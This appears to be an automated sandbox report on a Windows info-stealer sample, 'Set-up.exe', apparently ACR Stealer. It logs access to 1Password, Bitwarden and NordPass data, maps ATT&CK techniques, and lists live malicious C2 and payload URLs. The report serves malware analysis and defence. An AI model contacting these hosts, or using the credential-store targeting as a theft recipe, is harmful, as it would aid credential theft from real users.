            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Local\1Password\dataJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Local\1Password\dataJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\1Password\dataJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\BitwardenJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\BitwardenJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BitwardenJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\NordPassJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\NordPassJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Local\1Password\dataJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\BitwardenJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\BitwardenJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\NordPassJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\NordPassJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\NordPassJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Local\1Password\dataJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
            Source: Yara matchFile source: 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7572, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7572, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            311
            Process Injection
            311
            Process Injection
            3
            OS Credential Dumping
            111
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism
            1
            Abuse Elevation Control Mechanism
            LSASS Memory2
            Process Discovery
            Remote Desktop Protocol51
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            DLL Side-Loading
            Security Account Manager1
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS12
            System Information Discovery
            Distributed Component Object ModelInput Capture2
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1686586 Sample: Set-up.exe Startdate: 10/05/2025 Architecture: WINDOWS Score: 100 33 Suricata IDS alerts for network traffic 2->33 35 Antivirus detection for URL or domain 2->35 37 Yara detected ACR Stealer 2->37 39 Joe Sandbox ML detected suspicious sample 2->39 7 Set-up.exe 2->7         started        process3 dnsIp4 31 188.114.96.3, 49721, 49722, 49725 CLOUDFLARENETUS European Union 7->31 41 Found many strings related to Crypto-Wallets (likely being stolen) 7->41 43 Tries to harvest and steal ftp login credentials 7->43 45 Tries to harvest and steal browser information (history, passwords, etc) 7->45 47 7 other signatures 7->47 11 chrome.exe 7->11         started        13 chrome.exe 7->13         started        15 chrome.exe 7->15         started        17 chrome.exe 7->17         started        signatures5 process6 process7 19 WerFault.exe 16 11->19         started        21 WerFault.exe 16 11->21         started        23 WerFault.exe 16 13->23         started        25 WerFault.exe 16 13->25         started        27 WerFault.exe 16 15->27         started        29 WerFault.exe 16 15->29         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Set-up.exe4%VirustotalBrowse
            Set-up.exe0%ReversingLabs
            SAMPLE100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://mcrsftuptade.pro/Up100%Avira URL Cloudmalware
            http://www.netcrunch.tools/wmitool/0%Avira URL Cloudsafe
            http://mcrsftuptade.pro/Up/g100%Avira URL Cloudmalware
            http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371100%Avira URL Cloudmalware
            http://h1.coldwalk.top/sh.ext.exe.bin0%Avira URL Cloudsafe
            http://h1.coldwalk.top/amshm.bin0%Avira URL Cloudsafe
            http://mcrsftuptade.pro/Up/p100%Avira URL Cloudmalware
            http://mcrsftuptade.pro/Up/b100%Avira URL Cloudmalware
            http://www.mygale.org/~cresto/0%Avira URL Cloudsafe
            http://www.adremsoft.com/autoupdate/wmi.tools.json0%Avira URL Cloudsafe
            http://www.adremsoft.com/autoupdate/wmi.tools.jsonSVWU0%Avira URL Cloudsafe
            http://h1.coldwalk.top/shark.bin0%Avira URL Cloudsafe
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371true
            • Avira URL Cloud: malware
            unknown
            http://mcrsftuptade.pro/Up/gtrue
            • Avira URL Cloud: malware
            unknown
            http://mcrsftuptade.pro/Uptrue
            • Avira URL Cloud: malware
            unknown
            http://mcrsftuptade.pro/Up/ptrue
            • Avira URL Cloud: malware
            unknown
            http://mcrsftuptade.pro/Up/btrue
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://h1.coldwalk.top/amshm.binSet-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/ac/?q=chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://h1.coldwalk.top/sh.ext.exe.binSet-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/soap/envelope/Set-up.exefalse
                high
                http://www.netcrunch.tools/wmitool/Set-up.exe, 00000000.00000000.1241274498.0000000001A31000.00000002.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://crl.rootca1.amazontrust.com/rootca1.crl0Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://ac.ecosia.org?q=chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://upx.sf.netAmcache.hve.12.drfalse
                        high
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.rootca1.amazontrust.com0:Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.indyproject.org/Set-up.exefalse
                              high
                              https://www.google.com/images/branding/product/ico/googleg_alldp.icoSet-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.ecosia.org/newtab/v20Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.adremsoft.com/autoupdate/wmi.tools.jsonSet-up.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://x1.c.lencr.org/0Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://x1.i.lencr.org/0Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabv20Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.mygale.org/~cresto/Set-up.exe, 00000000.00000000.1241274498.0000000001A31000.00000002.00000001.01000000.00000003.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.adremsoft.com/autoupdate/wmi.tools.jsonSVWUSet-up.exefalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://gemini.google.com/app?q=chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://h1.coldwalk.top/shark.binSet-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                188.114.96.3
                                                unknownEuropean Union13335CLOUDFLARENETUStrue
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1686586
                                                Start date and time:2025-05-10 08:04:17 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Set-up.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@15/25@0/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 39
                                                • Number of non-executed functions: 11
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 184.29.183.29
                                                • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, www.microsoft.com, casoneroutegold-prod-bggfgca0dkaag8a8.b01.azurefd.net, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                No simulations
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                188.114.96.3Set-up_patched.exeGet hashmaliciousACR StealerBrowse
                                                • mcrsftuptade.pro/Up/g
                                                Set-up_patched.exeGet hashmaliciousACR StealerBrowse
                                                • mcrsftuptade.pro/Up/g
                                                http://188.114.96.3Get hashmaliciousUnknownBrowse
                                                • 188.114.96.3/favicon.ico
                                                g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                • www.comebackhome.online/dv29/?UPV=lyDuWv8anyDzCsrsL6PTwCreB/WdAINc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt1M3PZl4mowifUTZkIWOf1ffB0d/Fsg==&YrV=FlsDgRMx
                                                http://facebooksupports.tempisite.com/ils972/Get hashmaliciousUnknownBrowse
                                                • facebooksupports.tempisite.com/favicon.ico
                                                AGODA COMPANY PTE LTD.exeGet hashmaliciousFormBookBrowse
                                                • www.baurishu.info/6oy6/
                                                file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.actpisalnplay.cyou/3vjo/
                                                RFQPO-AA132426.exeGet hashmaliciousFormBookBrowse
                                                • www.actpisalnplay.cyou/3vjo/
                                                Swift copy.exeGet hashmaliciousFormBookBrowse
                                                • www.desktitle.homes/izqs/
                                                http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                                • www.brillflooring.com/
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUSOYNXZnHEXq.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.64.1
                                                Eab2SbtQbr.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.48.1
                                                A2RVVD9AhJ.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.112.1
                                                GS4TX46Pz7.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.48.1
                                                cdsuXkNCvF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 104.21.32.1
                                                nTTTS39M11.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 104.21.96.1
                                                FjPUv889pO.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                • 104.21.112.1
                                                8MF8j3kB7J.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.91.219
                                                LiVjGnY5Hx.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                • 104.21.112.1
                                                88ukoO6Zln.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.80.1
                                                No context
                                                No context
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.702028043803121
                                                Encrypted:false
                                                SSDEEP:96:d8+u6iJsrEoZGNfCQXIDcQic6ycEJcw3++HbHu2A2Z+ZwfZAX/d5FMT2SlPkpXmI:a+uJJb0c2TTj2zuiFWZ24lO89
                                                MD5:85B842F36425F0E179AF6F00B06087E2
                                                SHA1:E72612E63925A556FFC03CA2B9F456B9DA867B7D
                                                SHA-256:1C5C5A7B6AD24A6AD97C43A70FDF6B8F21007AD602144F8E175B1526FE9718CA
                                                SHA-512:DD050DE37584A145A356D68D6D2725CFA7962546C70214CDC686E73E125D07E8A684B8D926C0751F5EA999D481C74721E38376EC725CBD94045DCD87B9EBDB6D
                                                Malicious:false
                                                Reputation:low
